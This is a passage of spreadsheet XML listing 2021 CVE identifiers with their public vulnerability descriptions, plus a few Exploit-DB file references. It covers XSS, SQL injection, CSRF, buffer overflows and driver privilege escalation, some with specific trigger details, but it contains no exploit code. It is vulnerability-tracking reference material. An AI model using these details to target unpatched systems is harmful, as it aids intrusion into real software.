    <t>CVE-2021-3163</t>
  </si>
  <si>
    <t>** DISPUTED ** A vulnerability in the HTML editor of Slab Quill 4.8.0 allows an attacker to execute arbitrary JavaScript by storing an XSS payload (a crafted onloadstart attribute of an IMG element) in a text field. Note: Researchers have claimed that this issue is not within the product itself, but is intended behavior in a web browser.</t>
  </si>
  <si>
    <t>CVE-2021-31630</t>
  </si>
  <si>
    <t>Command Injection in Open PLC Webserver v3 allows remote attackers to execute arbitrary code via the "Hardware Layer Code Box" component on the "/hardware" page of the application.</t>
  </si>
  <si>
    <t>CVE-2021-31631</t>
  </si>
  <si>
    <t>b2evolution CMS v7.2.3 was discovered to contain a Cross-Site Request Forgery (CSRF) via the User login page. This vulnerability allows attackers to escalate privileges.</t>
  </si>
  <si>
    <t>CVE-2021-31632</t>
  </si>
  <si>
    <t>b2evolution CMS v7.2.3 was discovered to contain a SQL injection vulnerability via the parameter cfqueryparam in the User login section. This vulnerability allows attackers to execute arbitrary code via a crafted input.</t>
  </si>
  <si>
    <t>CVE-2021-3164</t>
  </si>
  <si>
    <t>ChurchRota 2.6.4 is vulnerable to authenticated remote code execution. The user does not need to have file upload permission in order to upload and execute an arbitrary file via a POST request to resources.php.</t>
  </si>
  <si>
    <t>exploits/hardware/webapps/49937.txt</t>
  </si>
  <si>
    <t>CHIYU IoT Devices - Denial of Service (DoS)</t>
  </si>
  <si>
    <t>CVE-2021-31641</t>
  </si>
  <si>
    <t>An unauthenticated XSS vulnerability exists in several IoT devices from CHIYU Technology, including BF-630, BF-450M, BF-430, BF-431, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC due to a lack of sanitization when the HTTP 404 message is generated.</t>
  </si>
  <si>
    <t>CVE-2021-31642</t>
  </si>
  <si>
    <t>A denial of service condition exists after an integer overflow in several IoT devices from CHIYU Technology, including BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC. The vulnerability can be explored by sending an unexpected integer (&gt; 32 bits) on the page parameter that will crash the web portal and making it unavailable until a reboot of the device.</t>
  </si>
  <si>
    <t>CVE-2021-31643</t>
  </si>
  <si>
    <t>An XSS vulnerability exists in several IoT devices from CHIYU Technology, including SEMAC, Biosense, BF-630, BF-631, and Webpass due to a lack of sanitization on the component if.cgi - username parameter.</t>
  </si>
  <si>
    <t>CVE-2021-31645</t>
  </si>
  <si>
    <t>An issue was discovered in glFTPd 2.11a that allows remote attackers to cause a denial of service via exceeding the connection limit.</t>
  </si>
  <si>
    <t>CVE-2021-31646</t>
  </si>
  <si>
    <t>Gestsup before 3.2.10 allows account takeover through the password recovery functionality (remote). The affected component is the file forgot_pwd.php - it uses a weak algorithm for the generation of password recovery tokens (the PHP uniqueid function), allowing a brute force attack.</t>
  </si>
  <si>
    <t>CVE-2021-31649</t>
  </si>
  <si>
    <t>In applications using jfinal 4.9.08 and below, there is a deserialization vulnerability when using redis,may be vulnerable to remote code execute</t>
  </si>
  <si>
    <t>CVE-2021-3165</t>
  </si>
  <si>
    <t>SmartAgent 3.1.0 allows a ViewOnly attacker to create a SuperUser account via the /#/CampaignManager/users URI.</t>
  </si>
  <si>
    <t>CVE-2021-31655</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in TRENDnet TV-IP110WN V1.2.2.64 V1.2.2.65 V1.2.2.68 via the profile parameter. in a GET request in view.cgi.</t>
  </si>
  <si>
    <t>CVE-2021-31658</t>
  </si>
  <si>
    <t>TP-Link TL-SG2005, TL-SG2008, etc. 1.0.0 Build 20180529 Rel.40524 is affected by an Array index error. The interface that provides the "device description" function only judges the length of the received data, and does not filter special characters. This vulnerability will cause the application to crash, and all device configuration information will be erased.</t>
  </si>
  <si>
    <t>CVE-2021-31659</t>
  </si>
  <si>
    <t>TP-Link TL-SG2005, TL-SG2008, etc. 1.0.0 Build 20180529 Rel.40524 is vulnerable to Cross Site Request Forgery (CSRF). All configuration information is placed in the URL, without any additional token authentication information. A malicious link opened by the switch administrator may cause the password of the switch to be modified and the configuration file to be tampered with.</t>
  </si>
  <si>
    <t>CVE-2021-3166</t>
  </si>
  <si>
    <t>An issue was discovered on ASUS DSL-N14U-B1 1.1.2.3_805 devices. An attacker can upload arbitrary file content as a firmware update when the filename Settings_DSL-N14U-B1.trx is used. Once this file is loaded, shutdown measures on a wide range of services are triggered as if it were a real update, resulting in a persistent outage of those services.</t>
  </si>
  <si>
    <t>CVE-2021-31660</t>
  </si>
  <si>
    <t>RIOT-OS 2021.01 before commit 85da504d2dc30188b89f44c3276fc5a25b31251f contains a buffer overflow which could allow attackers to obtain sensitive information.</t>
  </si>
  <si>
    <t>CVE-2021-31661</t>
  </si>
  <si>
    <t>RIOT-OS 2021.01 before commit 609c9ada34da5546cffb632a98b7ba157c112658 contains a buffer overflow that could allow attackers to obtain sensitive information.</t>
  </si>
  <si>
    <t>CVE-2021-31662</t>
  </si>
  <si>
    <t>RIOT-OS 2021.01 before commit 07f1254d8537497552e7dce80364aaead9266bbe contains a buffer overflow which could allow attackers to obtain sensitive information.</t>
  </si>
  <si>
    <t>CVE-2021-31663</t>
  </si>
  <si>
    <t>RIOT-OS 2021.01 before commit bc59d60be60dfc0a05def57d74985371e4f22d79 contains a buffer overflow which could allow attackers to obtain sensitive information.</t>
  </si>
  <si>
    <t>CVE-2021-31664</t>
  </si>
  <si>
    <t>RIOT-OS 2021.01 before commit 44741ff99f7a71df45420635b238b9c22093647a contains a buffer overflow which could allow attackers to obtain sensitive information.</t>
  </si>
  <si>
    <t>CVE-2021-3167</t>
  </si>
  <si>
    <t>In Cloudera Data Engineering (CDE) 1.3.0, JWT authentication tokens are exposed to administrators in virtual cluster server logs.</t>
  </si>
  <si>
    <t>exploits/multiple/webapps/50908.txt</t>
  </si>
  <si>
    <t>Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS)</t>
  </si>
  <si>
    <t>CVE-2021-31671</t>
  </si>
  <si>
    <t>pgsync before 0.6.7 is affected by Information Disclosure of sensitive information. Syncing the schema with the --schema-first and --schema-only options is mishandled. For example, the sslmode connection parameter may be lost, which means that SSL would not be used.</t>
  </si>
  <si>
    <t>CVE-2021-31673</t>
  </si>
  <si>
    <t>A Dom-based Cross-site scripting (XSS) vulnerability at registration account in Cyclos 4 PRO.14.7 and before allows remote attackers to inject arbitrary web script or HTML via the groupId parameter.</t>
  </si>
  <si>
    <t>CVE-2021-31674</t>
  </si>
  <si>
    <t>Cyclos 4 PRO 4.14.7 and before does not validate user input at error inform, which allows remote unauthenticated attacker to execute javascript code via undefine enum constant.</t>
  </si>
  <si>
    <t>CVE-2021-31676</t>
  </si>
  <si>
    <t>A reflected XSS was discovered in PESCMS-V2.3.3. When combined with CSRF in the same file, they can cause bigger destruction.</t>
  </si>
  <si>
    <t>CVE-2021-31677</t>
  </si>
  <si>
    <t>An issue was discovered in PESCMS-V2.3.3. There is a CSRF vulnerability that can modify admin and other members' passwords.</t>
  </si>
  <si>
    <t>CVE-2021-31678</t>
  </si>
  <si>
    <t>An issue was discovered in PESCMS-V2.3.3. There is a CSRF vulnerability that can delete import information about a user's company.</t>
  </si>
  <si>
    <t>CVE-2021-31679</t>
  </si>
  <si>
    <t>An issue was discovered in PESCMS-V2.3.3. There is a CSRF vulnerability that allows attackers to delete admin and other members' account numbers.</t>
  </si>
  <si>
    <t>CVE-2021-31682</t>
  </si>
  <si>
    <t>The login portal for the Automated Logic WebCTRL/WebCTRL OEM web application contains a vulnerability that allows for reflected XSS attacks due to the operatorlocale GET parameter not being sanitized. This issue impacts versions 6.5 and below. This issue works by passing in a basic XSS payload to a vulnerable GET parameter that is reflected in the output without sanitization.</t>
  </si>
  <si>
    <t>CVE-2021-31684</t>
  </si>
  <si>
    <t>A vulnerability was discovered in the indexOf function of JSONParserByteArray in JSON Smart versions 1.3 and 2.4 which causes a denial of service (DOS) via a crafted web request.</t>
  </si>
  <si>
    <t>CVE-2021-3169</t>
  </si>
  <si>
    <t>An issue in Jumpserver 2.6.2 and below allows attackers to create a connection token through an API which does not have access control and use it to access sensitive assets.</t>
  </si>
  <si>
    <t>CVE-2021-31698</t>
  </si>
  <si>
    <t>Quectel EG25-G devices through 202006130814 allow executing arbitrary code remotely by using an AT command to place shell metacharacters in quectel_handle_fumo_cfg input in atfwd_daemon.</t>
  </si>
  <si>
    <t>CVE-2021-31701</t>
  </si>
  <si>
    <t>Mintty before 3.4.7 mishandles Bracketed Paste Mode.</t>
  </si>
  <si>
    <t>CVE-2021-31702</t>
  </si>
  <si>
    <t>Frontier ichris through 5.18 mishandles making a DNS request for the hostname in the HTTP Host header, as demonstrated by submitting 127.0.0.1 multiple times for DoS.</t>
  </si>
  <si>
    <t>CVE-2021-31703</t>
  </si>
  <si>
    <t>Frontier ichris through 5.18 allows users to upload malicious executable files that might later be downloaded and run by any client user.</t>
  </si>
  <si>
    <t>CVE-2021-31712</t>
  </si>
  <si>
    <t>react-draft-wysiwyg (aka React Draft Wysiwyg) before 1.14.6 allows a javascript: URi in a Link Target of the link decorator in decorators/Link/index.js when a draft is shared across users, leading to XSS.</t>
  </si>
  <si>
    <t>CVE-2021-31718</t>
  </si>
  <si>
    <t>The server in npupnp before 4.1.4 is affected by DNS rebinding in the embedded web server (including UPnP SOAP and GENA endpoints), leading to remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-31721</t>
  </si>
  <si>
    <t>Chevereto before 3.17.1 allows Cross Site Scripting (XSS) via an image title at the image upload stage.</t>
  </si>
  <si>
    <t>CVE-2021-31726</t>
  </si>
  <si>
    <t>Akuvox C315 115.116.2613 allows remote command Injection via the cfgd_server service. The attack vector is sending a payload to port 189 (default root 0.0.0.0).</t>
  </si>
  <si>
    <t>CVE-2021-31727</t>
  </si>
  <si>
    <t>Incorrect access control in zam64.sys, zam32.sys in MalwareFox AntiMalware 2.74.0.150 where IOCTL's 0x80002014, 0x80002018 expose unrestricted disk read/write capabilities respectively. A non-privileged process can open a handle to \.\ZemanaAntiMalware, register with the driver using IOCTL 0x80002010 and send these IOCTL's to escalate privileges by overwriting the boot sector or overwriting critical code in the pagefile.</t>
  </si>
  <si>
    <t>CVE-2021-31728</t>
  </si>
  <si>
    <t>Incorrect access control in zam64.sys, zam32.sys in MalwareFox AntiMalware 2.74.0.150 allows a non-privileged process to open a handle to \.\ZemanaAntiMalware, register itself with the driver by sending IOCTL 0x80002010, allocate executable memory using a flaw in IOCTL 0x80002040, install a hook with IOCTL 0x80002044 and execute the executable memory using this hook with IOCTL 0x80002014 or 0x80002018, this exposes ring 0 code execution in the context of the driver allowing the non-privileged process to elevate privileges.</t>
  </si>
  <si>
    <t>CVE-2021-31731</t>
  </si>
  <si>
    <t>A directory traversal issue in KiteCMS 1.1.1 allows remote administrators to overwrite arbitrary files via ../ in the path parameter to index.php/admin/Template/fileedit, with PHP code in the html parameter.</t>
  </si>
  <si>
    <t>CVE-2021-31737</t>
  </si>
  <si>
    <t>emlog v5.3.1 and emlog v6.0.0 have a Remote Code Execution vulnerability due to upload of database backup file in admin/data.php.</t>
  </si>
  <si>
    <t>CVE-2021-31738</t>
  </si>
  <si>
    <t>Adiscon LogAnalyzer 4.1.10 and 4.1.11 allow login.php XSS.</t>
  </si>
  <si>
    <t>CVE-2021-31739</t>
  </si>
  <si>
    <t>The SEPPmail solution is vulnerable to a Cross-Site Scripting vulnerability (XSS), because user input is not correctly encoded in HTML attributes when returned by the server.SEPPmail 11.1.10 allows XSS via a recipient address.</t>
  </si>
  <si>
    <t>CVE-2021-31745</t>
  </si>
  <si>
    <t>Session Fixation vulnerability in login.php in Pluck-CMS Pluck 4.7.15 allows an attacker to sustain unauthorized access to the platform. Because Pluck does not invalidate prior sessions after a password change, access can be sustained even after an administrator performs regular remediation attempts such as resetting their password.</t>
  </si>
  <si>
    <t>CVE-2021-31746</t>
  </si>
  <si>
    <t>Zip Slip vulnerability in Pluck-CMS Pluck 4.7.15 allows an attacker to upload specially crafted zip files, resulting in directory traversal and potentially arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-31747</t>
  </si>
  <si>
    <t>Missing SSL Certificate Validation issue exists in Pluck 4.7.15 in update_applet.php, which could lead to man-in-the-middle attacks.</t>
  </si>
  <si>
    <t>CVE-2021-31755</t>
  </si>
  <si>
    <t>An issue was discovered on Tenda AC11 devices with firmware through 02.03.01.104_CN. A stack buffer overflow vulnerability in /goform/setmac allows attackers to execute arbitrary code on the system via a crafted post request.</t>
  </si>
  <si>
    <t>CVE-2021-31756</t>
  </si>
  <si>
    <t>An issue was discovered on Tenda AC11 devices with firmware through 02.03.01.104_CN. A stack buffer overflow vulnerability in /gofrom/setwanType allows attackers to execute arbitrary code on the system via a crafted post request. This occurs when input vector controlled by malicious attack get copied to the stack variable.</t>
  </si>
  <si>
    <t>CVE-2021-31757</t>
  </si>
  <si>
    <t>An issue was discovered on Tenda AC11 devices with firmware through 02.03.01.104_CN. A stack buffer overflow vulnerability in /goform/setVLAN allows attackers to execute arbitrary code on the system via a crafted post request.</t>
  </si>
  <si>
    <t>CVE-2021-31758</t>
  </si>
  <si>
    <t>An issue was discovered on Tenda AC11 devices with firmware through 02.03.01.104_CN. A stack buffer overflow vulnerability in /goform/setportList allows attackers to execute arbitrary code on the system via a crafted post request.</t>
  </si>
  <si>
    <t>CVE-2021-3176</t>
  </si>
  <si>
    <t>The chat window of the Mitel BusinessCTI Enterprise (MBC-E) Client for Windows before 6.4.15 and 7.x before 7.1.2 could allow an attacker to gain access to user information by sending certain code, due to improper input validation of http links. A successful exploit could allow an attacker to view user information and application data.</t>
  </si>
  <si>
    <t>exploits/linux/webapps/50126.py</t>
  </si>
  <si>
    <t>Webmin 1.973 - 'save_user.cgi' Cross-Site Request Forgery (CSRF)</t>
  </si>
  <si>
    <t>2021-07-14</t>
  </si>
  <si>
    <t>CVE-2021-31760</t>
  </si>
  <si>
    <t>Webmin 1.973 is affected by Cross Site Request Forgery (CSRF) to achieve Remote Command Execution (RCE) through Webmin's running process feature.</t>
  </si>
  <si>
    <t>CVE-2021-31761</t>
  </si>
  <si>
    <t>Webmin 1.973 is affected by reflected Cross Site Scripting (XSS) to achieve Remote Command Execution through Webmin's running process feature.</t>
  </si>
  <si>
    <t>CVE-2021-31762</t>
  </si>
  <si>
    <t>Webmin 1.973 is affected by Cross Site Request Forgery (CSRF) to create a privileged user through Webmin's add users feature, and then get a reverse shell through Webmin's running process feature.</t>
  </si>
  <si>
    <t>CVE-2021-31769</t>
  </si>
  <si>
    <t>MyQ Server in MyQ X Smart before 8.2 allows remote code execution by unprivileged users because administrative session data can be read in the %PROGRAMFILES%\MyQ\PHP\Sessions directory. The "Select server file" feature is only intended for administrators but actually does not require authorization. An attacker can inject arbitrary OS commands (such as commands to create new .php files) via the Task Scheduler component.</t>
  </si>
  <si>
    <t>CVE-2021-3177</t>
  </si>
  <si>
    <t>Python 3.x through 3.9.1 has a buffer overflow in PyCArg_repr in _ctypes/callproc.c, which may lead to remote code execution in certain Python applications that accept floating-point numbers as untrusted input, as demonstrated by a 1e300 argument to c_double.from_param. This occurs because sprintf is used unsafely.</t>
  </si>
  <si>
    <t>CVE-2021-31776</t>
  </si>
  <si>
    <t>Aviatrix VPN Client before 2.14.14 on Windows has an unquoted search path that enables local privilege escalation to the SYSTEM user, if the machine is misconfigured to allow unprivileged users to write to directories that are supposed to be restricted to administrators.</t>
  </si>
  <si>
    <t>CVE-2021-31777</t>
  </si>
  <si>
    <t>The dce (aka Dynamic Content Element) extension 2.2.0 through 2.6.x before 2.6.2, and 2.7.x before 2.7.1, for TYPO3 allows SQL Injection via a backend user account.</t>
  </si>
  <si>
    <t>CVE-2021-31778</t>
  </si>
  <si>
    <t>The media2click (aka 2 Clicks for External Media) extension 1.x before 1.3.3 for TYPO3 allows XSS by a backend user account.</t>
  </si>
  <si>
    <t>CVE-2021-31779</t>
  </si>
  <si>
    <t>The yoast_seo (aka Yoast SEO) extension before 7.2.1 for TYPO3 allows SSRF via a backend user account.</t>
  </si>
  <si>
    <t>CVE-2021-3178</t>
  </si>
  <si>
    <t>** DISPUTED ** fs/nfsd/nfs3xdr.c in the Linux kernel through 5.10.8, when there is an NFS export of a subdirectory of a filesystem, allows remote attackers to traverse to other parts of the filesystem via READDIRPLUS. NOTE: some parties argue that such a subdirectory export is not intended to prevent this attack; see also the exports(5) no_subtree_check default behavior.</t>
  </si>
  <si>
    <t>CVE-2021-31780</t>
  </si>
  <si>
    <t>In app/Model/MispObject.php in MISP 2.4.141, an incorrect sharing group association could lead to information disclosure on an event edit. When an object has a sharing group associated with an event edit, the sharing group object is ignored and instead the passed local ID is reused.</t>
  </si>
  <si>
    <t>CVE-2021-31783</t>
  </si>
  <si>
    <t>show_default.php in the LocalFilesEditor extension before 11.4.0.1 for Piwigo allows Local File Inclusion because the file parameter is not validated with a proper regular-expression check.</t>
  </si>
  <si>
    <t>CVE-2021-31784</t>
  </si>
  <si>
    <t>An out-of-bounds write vulnerability exists in the file-reading procedure in Open Design Alliance Drawings SDK before 2021.6 on all supported by ODA platforms in static configuration. This can allow attackers to cause a crash, potentially enabling a denial of service attack (Crash, Exit, or Restart) or possible code execution.</t>
  </si>
  <si>
    <t>CVE-2021-31785</t>
  </si>
  <si>
    <t>The Bluetooth Classic implementation on Actions ATS2815 and ATS2819 chipsets does not properly handle the reception of multiple LMP_host_connection_req packets, allowing attackers in radio range to trigger a denial of service (deadlock) of the device via crafted LMP packets. Manual user intervention is required to restart the device and restore Bluetooth communication.</t>
  </si>
  <si>
    <t>CVE-2021-31786</t>
  </si>
  <si>
    <t>The Bluetooth Classic Audio implementation on Actions ATS2815 and ATS2819 devices does not properly handle a connection attempt from a host with the same BDAddress as the current connected BT host, allowing attackers to trigger a disconnection and deadlock of the device by connecting with a forged BDAddress that matches the original connected host.</t>
  </si>
  <si>
    <t>CVE-2021-31787</t>
  </si>
  <si>
    <t>The Bluetooth Classic implementation on Actions ATS2815 chipsets does not properly handle the reception of continuous unsolicited LMP responses, allowing attackers in radio range to trigger a denial of service and shutdown of a device by flooding the target device with LMP_features_res packets.</t>
  </si>
  <si>
    <t>CVE-2021-3179</t>
  </si>
  <si>
    <t>GGLocker iOS application, contains an insecure data storage of the password hash value which results in an authentication bypass.</t>
  </si>
  <si>
    <t>CVE-2021-31791</t>
  </si>
  <si>
    <t>In Hardware Sentry KM before 10.0.01 for BMC PATROL, a cleartext password may be discovered after a failure or timeout of a command.</t>
  </si>
  <si>
    <t>CVE-2021-31792</t>
  </si>
  <si>
    <t>XSS in the client account page in SuiteCRM before 7.11.19 allows an attacker to inject JavaScript via the name field</t>
  </si>
  <si>
    <t>CVE-2021-31793</t>
  </si>
  <si>
    <t>An issue exists on NightOwl WDB-20-V2 WDB-20-V2_20190314 devices that allows an unauthenticated user to gain access to snapshots and video streams from the doorbell. The binary app offers a web server on port 80 that allows an unauthenticated user to take a snapshot from the doorbell camera via the /snapshot URI.</t>
  </si>
  <si>
    <t>CVE-2021-31794</t>
  </si>
  <si>
    <t>Settings.aspx?view=About in Directum 5.8.2 allows XSS via the HTTP User-Agent header.</t>
  </si>
  <si>
    <t>CVE-2021-31795</t>
  </si>
  <si>
    <t>The PowerVR GPU kernel driver in pvrsrvkm.ko through 2021-04-24 for the Linux kernel, as used on Alcatel 1S phones, allows attackers to overwrite heap memory via PhysmemNewRamBackedPMR.</t>
  </si>
  <si>
    <t>CVE-2021-31796</t>
  </si>
  <si>
    <t>An inadequate encryption vulnerability discovered in CyberArk Credential Provider before 12.1 may lead to Information Disclosure. An attacker may realistically have enough information that the number of possible keys (for a credential file) is only one, and the number is usually not higher than 2^36.</t>
  </si>
  <si>
    <t>CVE-2021-31797</t>
  </si>
  <si>
    <t>The user identification mechanism used by CyberArk Credential Provider prior to 12.1 is susceptible to a local host race condition, leading to password disclosure.</t>
  </si>
  <si>
    <t>CVE-2021-31798</t>
  </si>
  <si>
    <t>The effective key space used to encrypt the cache in CyberArk Credential Provider prior to 12.1 has low entropy, and under certain conditions a local malicious user can obtain the plaintext of cache files.</t>
  </si>
  <si>
    <t>CVE-2021-31799</t>
  </si>
  <si>
    <t>In RDoc 3.11 through 6.x before 6.3.1, as distributed with Ruby through 3.0.1, it is possible to execute arbitrary code via | and tags in a filename.</t>
  </si>
  <si>
    <t>CVE-2021-31800</t>
  </si>
  <si>
    <t>Multiple path traversal vulnerabilities exist in smbserver.py in Impacket through 0.9.22. An attacker that connects to a running smbserver instance can list and write to arbitrary files via ../ directory traversal. This could potentially be abused to achieve arbitrary code execution by replacing /etc/shadow or an SSH authorized key.</t>
  </si>
  <si>
    <t>CVE-2021-31802</t>
  </si>
  <si>
    <t>NETGEAR R7000 1.0.11.116 devices have a heap-based Buffer Overflow that is exploitable from the local network without authentication. The vulnerability exists within the handling of an HTTP request. An attacker can leverage this to execute code as root. The problem is that a user-provided length value is trusted during a backup.cgi file upload. The attacker must add a \n before the Content-Length header.</t>
  </si>
  <si>
    <t>CVE-2021-31803</t>
  </si>
  <si>
    <t>cPanel before 94.0.3 allows self-XSS via EasyApache 4 Save Profile (SEC-581).</t>
  </si>
  <si>
    <t>CVE-2021-31804</t>
  </si>
  <si>
    <t>LeoCAD before 21.03 sometimes allows a use-after-free during the opening of a new document.</t>
  </si>
  <si>
    <t>CVE-2021-31805</t>
  </si>
  <si>
    <t>The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag’s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.</t>
  </si>
  <si>
    <t>CVE-2021-31806</t>
  </si>
  <si>
    <t>An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to a memory-management bug, it is vulnerable to a Denial of Service attack (against all clients using the proxy) via HTTP Range request processing.</t>
  </si>
  <si>
    <t>CVE-2021-31807</t>
  </si>
  <si>
    <t>An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. An integer overflow problem allows a remote server to achieve Denial of Service when delivering responses to HTTP Range requests. The issue trigger is a header that can be expected to exist in HTTP traffic without any malicious intent.</t>
  </si>
  <si>
    <t>CVE-2021-31808</t>
  </si>
  <si>
    <t>An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to an input-validation bug, it is vulnerable to a Denial of Service attack (against all clients using the proxy). A client sends an HTTP Range request to trigger this.</t>
  </si>
  <si>
    <t>CVE-2021-3181</t>
  </si>
  <si>
    <t>rfc822.c in Mutt through 2.0.4 allows remote attackers to cause a denial of service (mailbox unavailability) by sending email messages with sequences of semicolon characters in RFC822 address fields (aka terminators of empty groups). A small email message from the attacker can cause large memory consumption, and the victim may then be unable to see email messages from other persons.</t>
  </si>
  <si>
    <t>CVE-2021-31810</t>
  </si>
  <si>
    <t>An issue was discovered in Ruby through 2.6.7, 2.7.x through 2.7.3, and 3.x through 3.0.1. A malicious FTP server can use the PASV response to trick Net::FTP into connecting back to a given IP address and port. This potentially makes curl extract information about services that are otherwise private and not disclosed (e.g., the attacker can conduct port scans and service banner extractions).</t>
  </si>
  <si>
    <t>CVE-2021-31811</t>
  </si>
  <si>
    <t>In Apache PDFBox, a carefully crafted PDF file can trigger an OutOfMemory-Exception while loading the file. This issue affects Apache PDFBox version 2.0.23 and prior 2.0.x versions.</t>
  </si>
  <si>
    <t>CVE-2021-31812</t>
  </si>
  <si>
    <t>In Apache PDFBox, a carefully crafted PDF file can trigger an infinite loop while loading the file. This issue affects Apache PDFBox version 2.0.23 and prior 2.0.x versions.</t>
  </si>
  <si>
    <t>CVE-2021-31813</t>
  </si>
  <si>
    <t>Zoho ManageEngine Applications Manager before 15130 is vulnerable to Stored XSS while importing malicious user details (e.g., a crafted user name) from AD.</t>
  </si>
  <si>
    <t>CVE-2021-31814</t>
  </si>
  <si>
    <t>In Stormshield 1.1.0, and 2.1.0 through 2.9.0, an attacker can block a client from accessing the VPN and can obtain sensitive information through the SN VPN SSL Client.</t>
  </si>
  <si>
    <t>CVE-2021-31815</t>
  </si>
  <si>
    <t>GAEN (aka Google/Apple Exposure Notifications) through 2021-04-27 on Android allows attackers to obtain sensitive information, such as a user's location history, in-person social graph, and (sometimes) COVID-19 infection status, because Rolling Proximity Identifiers and MAC addresses are written to the Android system log, and many Android devices have applications (preinstalled by the hardware manufacturer or network operator) that read system log data and send it to third parties. NOTE: a news outlet (The Markup) states that they received a vendor response indicating that fix deployment "began several weeks ago and will be complete in the coming days."</t>
  </si>
  <si>
    <t>CVE-2021-31816</t>
  </si>
  <si>
    <t>When configuring Octopus Server if it is configured with an external SQL database, on initial configuration the database password is written to the OctopusServer.txt log file in plaintext.</t>
  </si>
  <si>
    <t>CVE-2021-31817</t>
  </si>
  <si>
    <t>CVE-2021-31818</t>
  </si>
  <si>
    <t>Affected versions of Octopus Server are prone to an authenticated SQL injection vulnerability in the Events REST API because user supplied data in the API request isn’t parameterised correctly. Exploiting this vulnerability could allow unauthorised access to database tables.</t>
  </si>
  <si>
    <t>CVE-2021-31819</t>
  </si>
  <si>
    <t>In Halibut versions prior to 4.4.7 there is a deserialisation vulnerability that could allow remote code execution on systems that already trust each other based on certificate verification.</t>
  </si>
  <si>
    <t>CVE-2021-3182</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** D-Link DCS-5220 devices have a buffer overflow. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
  </si>
  <si>
    <t>CVE-2021-31820</t>
  </si>
  <si>
    <t>In Octopus Server after version 2018.8.2 if the Octopus Server Web Request Proxy is configured with authentication, the password is shown in plaintext in the UI.</t>
  </si>
  <si>
    <t>CVE-2021-31821</t>
  </si>
  <si>
    <t>When the Windows Tentacle docker image starts up it logs all the commands that it runs along with the arguments, which writes the Octopus Server API key in plaintext. This does not affect the Linux Docker image</t>
  </si>
  <si>
    <t>CVE-2021-31822</t>
  </si>
  <si>
    <t>When Octopus Tentacle is installed on a Linux operating system, the systemd service file permissions are misconfigured. This could lead to a local unprivileged user modifying the contents of the systemd service file to gain privileged access.</t>
  </si>
  <si>
    <t>CVE-2021-31826</t>
  </si>
  <si>
    <t>Shibboleth Service Provider 3.x before 3.2.2 is prone to a NULL pointer dereference flaw involving the session recovery feature. The flaw is exploitable (for a daemon crash) on systems not using this feature if a crafted cookie is supplied.</t>
  </si>
  <si>
    <t>CVE-2021-31827</t>
  </si>
  <si>
    <t>In Progress MOVEit Transfer before 2021.0 (13.0), a SQL injection vulnerability has been found in the MOVEit Transfer web app that could allow an authenticated attacker to gain unauthorized access to MOVEit Transfer's database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker may be able to infer information about the structure and contents of the database in addition to executing SQL statements that alter or destroy database elements. This is in MOVEit.DMZ.WebApp in SILHuman.vb.</t>
  </si>
  <si>
    <t>CVE-2021-31828</t>
  </si>
  <si>
    <t>An SSRF issue in Open Distro for Elasticsearch (ODFE) before 1.13.1.0 allows an existing privileged user to enumerate listening services or interact with configured resources via HTTP requests exceeding the Alerting plugin's intended scope.</t>
  </si>
  <si>
    <t>CVE-2021-31829</t>
  </si>
  <si>
    <t>kernel/bpf/verifier.c in the Linux kernel through 5.12.1 performs undesirable speculative loads, leading to disclosure of stack content via side-channel attacks, aka CID-801c6058d14a. The specific concern is not protecting the BPF stack area against speculative loads. Also, the BPF stack can contain uninitialized data that might represent sensitive information previously operated on by the kernel.</t>
  </si>
  <si>
    <t>CVE-2021-3183</t>
  </si>
  <si>
    <t>Files.com Fat Client 3.3.6 allows authentication bypass because the client continues to have access after a logout and a removal of a login profile.</t>
  </si>
  <si>
    <t>CVE-2021-31830</t>
  </si>
  <si>
    <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in McAfee Database Security (DBSec) prior to 4.8.2 allows an administrator to embed JavaScript code when configuring the name of a database to be monitored. This would be triggered when any authorized user logs into the DBSec interface and opens the properties configuration page for this database.</t>
  </si>
  <si>
    <t>CVE-2021-31831</t>
  </si>
  <si>
    <t>Incorrect access to deleted scripts vulnerability in McAfee Database Security (DBSec) prior to 4.8.2 allows a remote authenticated attacker to gain access to signed SQL scripts which have been marked as deleted or expired within the administrative console. This access was only available through the REST API.</t>
  </si>
  <si>
    <t>CVE-2021-31832</t>
  </si>
  <si>
    <t>Improper Neutralization of Input in the ePO administrator extension for McAfee Data Loss Prevention (DLP) Endpoint for Windows prior to 11.6.200 allows a remote ePO DLP administrator to inject JavaScript code into the alert configuration text field. This JavaScript will be executed when an end user triggers a DLP policy on their machine.</t>
  </si>
  <si>
    <t>CVE-2021-31833</t>
  </si>
  <si>
    <t>Potential product security bypass vulnerability in McAfee Application and Change Control (MACC) prior to version 8.3.4 allows a locally logged in attacker to circumvent the application solidification protection provided by MACC, permitting them to run applications that would usually be prevented by MACC. This would require the attacker to rename the specified binary to match name of any configured updater and perform a specific set of steps, resulting in the renamed binary to be to run.</t>
  </si>
  <si>
    <t>CVE-2021-31834</t>
  </si>
  <si>
    <t>Stored Cross-Site Scripting vulnerability in McAfee ePolicy Orchestrator (ePO) prior to 5.10 Update 11 allows ePO administrators to inject arbitrary web script or HTML via multiple parameters where the administrator's entries were not correctly sanitized.</t>
  </si>
  <si>
    <t>CVE-2021-31835</t>
  </si>
  <si>
    <t>Cross-Site Scripting vulnerability in McAfee ePolicy Orchestrator (ePO) prior to 5.10 Update 11 allows ePO administrators to inject arbitrary web script or HTML via a specific parameter where the administrator's entries were not correctly sanitized.</t>
  </si>
  <si>
    <t>CVE-2021-31836</t>
  </si>
  <si>
    <t>Improper privilege management vulnerability in maconfig for McAfee Agent for Windows prior to 5.7.4 allows a local user to gain access to sensitive information. The utility was able to be run from any location on the file system and by a low privileged user.</t>
  </si>
  <si>
